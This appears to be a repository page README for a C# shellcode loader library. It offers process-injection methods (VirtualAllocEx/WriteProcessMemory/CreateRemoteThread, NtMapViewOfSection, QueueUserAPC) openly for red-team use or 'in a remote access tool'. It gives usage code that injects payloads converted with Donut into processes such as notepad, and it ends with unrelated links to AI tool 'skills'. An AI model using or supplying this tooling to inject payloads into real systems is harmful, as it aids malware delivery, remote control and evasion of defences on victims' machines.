ShellCodeLoaderCSharp
A small shellcode loader library written in C#
Install / Use
/learn @arsium/ShellCodeLoaderCSharpREADME
ShellCodeLoader
A small shellcode loader library written in C#. <br> This small library allows you to inject shellcode in memory of current launched file or any other processes using different techniques. Useful to use as red team or in a remote access tool. Works for 32 & 64 bit shellcode.
Note :
- has been tested on same process and notepad as target
I added some test payloads which I've converted with
- First with : Donut (https://github.com/TheWover/donut) : turns my payload into raw shellcode
- Second with HxD Editor (https://mh-nexus.de/en/downloads.php?product=HxD20) : gives me an array of raw bytes from payloads converted with Donut
How to use it ?
For same process:
ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);
cpp.LoadWithKernel32();//can be LoadWithNTDelegates , LoadWithKernel32Delegates or LoadWithNT
cpp.Dispose();
For other processes:
Process Target = Process.GetProcessesByName("notepad")[0];
ShellCodeLoader.ShellCodeLoaderEx cpp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCpp64.rawData);
cpp.LoadWithKernel32();//or cpp.LoadWithNT();
cpp.Dispose();
MapView:
ShellCodeLoader.MapView cpp = new ShellCodeLoader.MapView(PayloadCpp64.rawData);
cpp.LoadWithNtMapView();
cpp.Dispose();
MapView with target:
ShellCodeLoader.MapView cpp = new ShellCodeLoader.MapView(Target, PayloadCpp64.rawData);
cpp.LoadWithNtMapView();
cpp.Dispose();
QueueAPC:
ShellCodeLoader.QueueAPC cpp = new ShellCodeLoader.QueueAPC(PayloadCpp64.rawData);
cpp.LoadWithQueueAPC();
cpp.Dispose();
Minimal API:
ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI cpp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCpp64.rawData);
cpp.Asynchronous = true;// false otherwise
cpp.LoadWithMinimalAPI();
cpp.Dispose();
Includes :
- Asynchronous (a simple Task.Run to not block main thread)
- Loading with Kernel32
- Loading with NtDll
- NtDll : NtAllocateVirtualMemory
- NtDll : NtWriteVirtualMemory
- NtDll : NtProtectVirtualMemory
- NtDll : NtFreeVirtualMemory
- NtDll : NtCreateThreadEx
- NtDll : NtCreateSection
- NtDll : NtMapViewOfSection
- NtDll : NtTestAlert
- Kernel32 : GetCurrentProcess
- Kernel32 : VirtualAlloc
- Kernel32 : VirtualAllocEx
- Kernel32 : VirtualFree
- Kernel32 : VirtualProtect
- Kernel32 : VirtualProtectEx
- Kernel32 : WriteProcessMemory
- Kernel32 : CreateRemoteThread
- Kernel32 : GetModuleHandle
- Kernel32 : GetProcAddress
- Kernel32 : QueueUserAPC
- Kernel32 : SleepEx
- Enumeration : PageProtection
- Enumeration : TypeAlloc
- Enumeration: FreeType
- Enumeration : SectionAccess
- Enumeration : MappingAttributes
- Delegates : all functions have been written with delegate style except GetModuleHandle and GetProcAddress
TODO :
- <s>Inject shellcode in another process with VirtualEx and NtEx functions</s>
- Check if shellcode is 64 or 32 bit before injection
- Check if dll (kernel32, ntdll) have been loaded
Known :
- Debugging 32 bit test injection involves PInvokeStackImbalance
Related Skills
node-connect
337.7kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
83.3kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
337.7kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
commit-push-pr
83.3kCommit, push, and open a PR
